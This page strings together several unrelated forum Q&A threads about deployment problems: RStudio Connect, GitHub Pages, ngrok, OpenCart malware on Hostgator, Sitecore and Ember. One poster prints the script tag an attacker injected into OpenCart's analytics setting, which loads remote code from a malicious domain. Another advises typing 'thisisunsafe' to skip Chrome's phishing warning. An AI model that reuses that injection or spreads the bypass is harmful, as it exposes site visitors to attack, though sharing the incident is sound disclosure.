I am trying to publish an RMarkdown document that I have edited in RStudio. but it's unfortunate that I am quite confused the way I need to go about this publishment.
I am requested to Enter the Public URL of the RStudio Connect server:
I searched through internet, how I can find this URL but I have failed to find it. I even filled the form on https://rstudio.com/products/connect/ but did not yield any positive result.
Kindly help to know what is wrong with my Rstudio connect and what I do to address this issue.
thank you in advance!
Below is the the screenshot of the message I am being given.
enter image description here
I finally found that the error I was experiencing is due to the location of the project location (directory) I am working with which was different from the current directory.
In addition to this, I found that I needed to knit the document to html before proceeding to publishing it.
The issue has been now addressed, thanks!
Related
Here is my github:
https://github.com/changan1111/DeployGHPage
i am able to successfully publish using ngh --dir dist/ng-fundamentals
It returns successfully published and I am seeing a branch ghPages..
when i open the url https://changan1111.github.io/DeployGHPage/ i am seeing empty page.
What is the wrong in this? can any please help on this?
You should open https://changan1111.github.io/DeployGHPage/ instead. Your app is working here. Note that it can take some time (10-15min) between the enabling of GitHub Pages and the URL working.
recently I came across this issue when I exposed my port via ngRok.
I simply forwarded it but when I tried to open the ngRok url I got Deceptive site ahead warning.
Here is the image of the warning.
It was a django server with graphql and I wanted to test graphiql. (this point might not be necessary for the reader but more info is always better than no info)
So the solution I found was to click on the red empty area and type "thisisunsafe" (without quotes of-course)
PS: I searched for the solution but couldn't find any I hope this will help others who are looking for the same.
Another workaround that I found is using that same URL in an incognito window. I'm not sure why the security is more lax there...but it works.
I currently host a website on Hostgator. My site redirects to an Adobe Flash Update automatically. I contacted support at Hostgator and they did not want to help, they said I need to contact sitelock to remove the malware is causing the redirection.
I ftp in to the server and found there is a ".security" folder which seems to be the cause of the problem. It has some zip files and other php files. I cannot change its permissions nor delete it.
Does anyone knows how can I remove this malware from the server? Any help is welcome thank you.
In reference to my last issue with Hostgator and a Malware site.
The site was running OpenCart and I found that the origin of the problem was within the back end of OpenCart, specifically under Settings > Server > Google Analytics Code with a suspicious domain in the text area.
`<!-- startgoogle -->
<script src="http://nam.su/google2"></script>
<!-- endgoogle --></head>`
Whoever did this to the site was able to login and manually enter the script in the poorly escaped and sanitize text area. Therefore making a mess. I just hope that I don't get banned from this site for publishing the link above but I think that someone may come across a similar problem and find this 'honest' mistake, useful. I am also interested in what's wrong with OpenCart's textarea.
I was trying to install the default Storefront site(powered by Commerce Server). It looks good at the moment, I managed to rebuild all indexes and publish the content. However, I can't reach product detail page - I receive an exception.
Example here.
I had faced with the similar issue when I tried to click on any catalog category.
The log-file contains the same error message without any details. Could you please suggest something to fix this issue?
P.S. After the finishing the installation I didn't have any products on the site. I fixed that issue:
selected the default Adventure Works catalog in the Sitecore tree(using content manager).
Filled in field CategoryDatasource(with the path to categories)
I think it might cause the error which I described above.
Thank you in advance for the help.
You have to set the catalog for the site via a home node property.
I have downloaded code from code project site (http://www.codeproject.com/Articles/511031/A-sample-real-time-web-application-using-Ember-js?msg=4693404#xx4693404xx) it is running fine when i run in local but once i keep in server and browse with url it is not opening.
http://drjeppesen.dyndns.org/onlineorder/ser/Ember.n.SignalR/
Displaying empty screen. Can anyone help to find the way how can i run this?
If you see the browser console, your server is requesting the javascripts and css's in the wrong path. For example, a request is made for http://drjeppesen.dyndns.org/onlineorder/Scripts/u.js, but the correct path is http://drjeppesen.dyndns.org/onlineorder/ser/Ember.n.SignalR/Scripts/u.js